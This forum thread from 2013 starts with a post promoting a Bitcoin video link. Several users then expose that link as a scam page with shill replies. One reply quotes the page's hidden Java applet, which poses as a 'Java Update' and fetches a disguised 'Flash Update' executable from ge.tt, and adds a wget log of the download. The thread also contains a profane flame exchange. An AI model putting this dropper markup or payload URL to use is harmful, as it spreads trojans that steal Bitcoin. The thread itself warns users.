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May 24, 2013, 09:02:55 PM
Last edit: May 25, 2013, 01:42:38 AM by tysat
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I just watched an absolutely fascinating and eye opening video showcasing the small town of Kreuzberg, Berlin the videos about how much the community has adapted to Bitcoins. Its amazing to me that almost every single store in the whole community accepts Bitcoins, thats just awesome!!

I believe this video showcases the FUTURE of Bitcoin and how it will be in a year or so worldwide. Interest in Bitcoin is continuing to rise exponentially (take a look at google search) because people are realizing theres a way to get out of inflation based government currencies, and to hold their wealth in a currency out of the control of greedy bankers. Whether it takes one year or five years its inevitable, crypto currencies are the future of currency.

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If this video reveals anything of Bitcoins future we are all going to go down as the founding fathers, and some damn rich people Smiley
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May 24, 2013, 09:07:47 PM
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Truly is a great video, amazing advertisement for Bitcoin to.
We can only hope the rest of the world will do as Germany!
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May 24, 2013, 09:42:27 PM
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Virus! Do not click!
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May 24, 2013, 09:46:26 PM
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Fantastic video and a good exemple to all Europe UnionSmiley

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May 24, 2013, 09:48:59 PM
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Yes we are all going to be privileged hipsters living in the scene district of a major city.
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May 24, 2013, 09:49:24 PM
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Nice video
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May 24, 2013, 10:44:02 PM
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Very good report.  Thanks for the link.

Dankedan: price seems low, time to sell I think...
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May 24, 2013, 11:18:15 PM
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Trojan Horse on link.
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May 24, 2013, 11:29:44 PM
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Trojan Horse on link.
I don't know for sure, but chromium asked me if I wanted to run Java on the website. (Of course I don't!)
Seems fishy.

Also: The link isn't to the shown address!
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May 24, 2013, 11:31:39 PM
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Trojan Horse on link.

You only have to worry about that if you're connecting from a Greek IP address...

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May 24, 2013, 11:44:45 PM
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All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.

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May 24, 2013, 11:50:38 PM
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All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.

I would certainly be interested in the chain of logic that leads you to that conclusion.

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May 25, 2013, 12:08:28 AM
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Well the first reply happened in < 5 minutes!

Notice the link URL is *NOT* the URL that the anchor text is. The forum shouldn't allow this.

Definitely a scam / attempted virus. And yes those accounts are fake.

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May 25, 2013, 12:13:17 AM
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All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.

I would certainly be interested in the chain of logic that leads you to that conclusion.

No answer, huh?

I've been involved with bitcoin since Q! of'11 - apparently longer than you.  I've (under this user account)  made several donations to projects:  thefounder, fellowtraveller, and etc.  I've never asked anyone for anything, and have been as helpful as possible to the noobs.

And you have the fucking goddamn gall to accuse me of being a potential scammer?  Not even a scammer, but some kind of Minority Report someday scammer?

You fucking piece of shit.

Dankedan: price seems low, time to sell I think...
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May 25, 2013, 12:15:44 AM
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I'm not clicking any link that doesn't go to where it says it goes.

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May 25, 2013, 12:16:43 AM
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All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.

I would certainly be interested in the chain of logic that leads you to that conclusion.

No answer, huh?

I've been involved with bitcoin since Q! of'11 - apparently longer than you.  I've (under this user account)  made several donations to projects:  thefounder, fellowtraveller, and etc.  I've never asked anyone for anything, and have been as helpful as possible to the noobs.

And you have the fucking goddamn gall to accuse me of being a potential scammer?  Not even a scammer, but some kind of Minority Report someday scammer?

You fucking piece of shit.

Relax my friend, I have seen your posts here and they are good. I think the guy who accused you lumped you in with the other accounts which very well may be scams. Honest mistake. Let's look at the bigger issue here which is that the OP is most likely a scam due to virus on the site and fake anchor text made to make the link appear more credible. You should check to make sure you were not infected. It looks like the site tried to use a Java dropper to place a BTC stealing trojan.

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May 25, 2013, 12:17:10 AM
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Well the first reply happened in < 5 minutes!

Notice the link URL is *NOT* the URL that the anchor text is. The forum shouldn't allow this.

Definitely a scam / attempted virus. And yes those accounts are fake.

MODERATORS REMOVE THIS!

What's wrong with that link?  I saw an ad and a Guardian News article.

Dankedan: price seems low, time to sell I think...
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May 25, 2013, 12:18:19 AM
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You can embed other site in a page.

What is probably happening in this case:

[ trojan site [ Guardian News article] ]
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May 25, 2013, 12:20:40 AM
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All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.

I would certainly be interested in the chain of logic that leads you to that conclusion.

No answer, huh?

I've been involved with bitcoin since Q! of'11 - apparently longer than you.  I've (under this user account)  made several donations to projects:  thefounder, fellowtraveller, and etc.  I've never asked anyone for anything, and have been as helpful as possible to the noobs.

And you have the fucking goddamn gall to accuse me of being a potential scammer?  Not even a scammer, but some kind of Minority Report someday scammer?

You fucking piece of shit.

Relax my friend, I have seen your posts here and they are good. I think the guy who accused you lumped you in with the other accounts which very well may be scams. Honest mistake. Let's look at the bigger issue here which is that the OP is most likely a scam due to virus on the site and fake anchor text made to make the link appear more credible. You should check to make sure you were not infected. It looks like the site tried to use a Java dropper to place a BTC stealing trojan.

That Tomatocage motherfucker can kiss my ass.  Honest people make honest mistakes - people who want power over others just hurt people to gain power.  I've read his bullshit 'How to Spot a Scammer', and he's a goddamn imbecile.

As for the link, I didn't notice.  I disable Java.

Dankedan: price seems low, time to sell I think...
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May 25, 2013, 12:23:33 AM
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Well the first reply happened in < 5 minutes!

Notice the link URL is *NOT* the URL that the anchor text is. The forum shouldn't allow this.

Definitely a scam / attempted virus. And yes those accounts are fake.

MODERATORS REMOVE THIS!

What's wrong with that link?  I saw an ad and a Guardian News article.

The Guardian News article is embedded in the page. But at the bottom of the page is the following code:

<applet name="Java Update 2.06" code="JavaManager.class" archive="cCyzqjNv.jar" width="0" height="0">^M
<param name="mylink" value="taskmgr.exe">^M
<param name="putserver" value="http://ge.tt/api/1/files/8jfPsUh/0/blob?download">^M
<param name="diversion" value="">^M

It attempts to install a trojan. Here is my wget dump... sorry I don't have time to do more in depth analysis on this. But definite virus.

--2013-05-24 20:23:47--  http://ge.tt/api/1/files/8jfPsUh/0/blob?download
Resolving ge.tt... 79.125.123.149
Connecting to ge.tt|79.125.123.149|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download= [following]
--2013-05-24 20:23:47--  http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download=
Resolving w301638.open.ge.tt... 54.228.183.153
Connecting to w301638.open.ge.tt|54.228.183.153|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download [following]
--2013-05-24 20:23:47--  http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download
Resolving w144938.blob4.ge.tt... 54.247.2.234
Connecting to w144938.blob4.ge.tt|54.247.2.234|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 819200 (800K) [application/x-msdownload]
Saving to: `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download'

100%[===================================================================================================================>] 819,200      341K/s   in 2.3s

2013-05-24 20:23:50 (341 KB/s) - `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download' saved [819200/819200]

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